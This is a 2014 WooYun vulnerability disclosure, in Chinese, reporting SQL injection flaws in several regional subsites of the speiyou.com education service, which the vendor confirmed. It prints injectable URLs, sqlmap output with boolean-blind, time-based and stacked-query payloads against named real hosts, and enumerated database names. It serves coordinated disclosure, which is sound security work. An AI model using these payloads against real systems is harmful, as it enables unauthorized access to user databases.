当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075628

漏洞标题:学而思培优多个分站存在SQL注入漏洞2

相关厂商:好未来集团学而思培优

漏洞作者: 浮萍

提交时间:2014-09-10 10:58

修复时间:2014-10-25 11:00

公开时间:2014-10-25 11:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-10: 细节已通知厂商并且等待厂商处理中
2014-09-11: 厂商已经确认,细节仅向厂商公开
2014-09-21: 细节向核心白帽子及相关领域专家公开
2014-10-01: 细节向普通白帽子公开
2014-10-11: 细节向实习白帽子公开
2014-10-25: 细节向公众公开

简要描述:

wooyun-2014-075014已修复
其他的问题

详细说明:

speiyou站
在"年级"处
郑州
http://zz.speiyou.com/search/index

Snap11.jpg


在年级处任意选择一个

Snap12.jpg


http://zz.speiyou.com/search/index/grade:ff808081427f932601428f4484932916/subject:/level:bx/term:/gtype:tea
在grade参数后输入'

Snap13.jpg


注入点:
http://zz.speiyou.com/search/index/grade:ff808081427f932601428f4484932916/subject:/level:bx/term:/gtype:tea

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://zz.speiyou.com:80/search/index/subject:/grade:ff808081427f93
2601428f443c562912' AND 1352=1352 AND 'mcTx'='mcTx/gtype:time
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://zz.speiyou.com:80/search/index/subject:/grade:ff808081427f93
2601428f443c562912' AND SLEEP(5) AND 'JjCx'='JjCx/gtype:time
---


数据库

available databases [3]:
[*] information_schema
[*] test
[*] xxgl


数据库信息与http://wooyun.org/bugs/wooyun-2014-075014中一致

漏洞证明:

同理
北京:

http://sbj.speiyou.com/search/index/subject:ff80808127d77caa0127d7e10f1c00c4/grade:ff80808127fabe0c0127fae69bc1004a/gtype:time


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: URI
Parameter: #1*
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://sbj.speiyou.com:80/search/index/subject:ff80808127d77caa0127
d7e10f1c00c4/grade:ff80808127fabe0c0127fae69bc1004a'; SELECT SLEEP(5)-- /gtype:t
ime
---
[23:12:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11


--------------
天津
http://stj.speiyou.com/search/index/subject:/grade:13/gtype:time

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 148 HTTP(s) req
uests:
---
Place: URI
Parameter: #1*
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://stj.speiyou.com:80/search/index/subject:/grade:13'; SELECT S
LEEP(5)-- /gtype:time
---


Snap14.jpg


---------------
其他就不再测试了
可以看看学科、班次和班级类型处是否有注入
还有排查老站点是否存在这些问题
另外发现了几处源码不知是不是学而思的
https://github.com/javaxiaomangren/schedule
https://github.com/heatroom/nightmare-mooc

修复方案:

版权声明:转载请注明来源 浮萍@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-11 11:21

厂商回复:

感谢洞主提醒,正在检查

最新状态:

暂无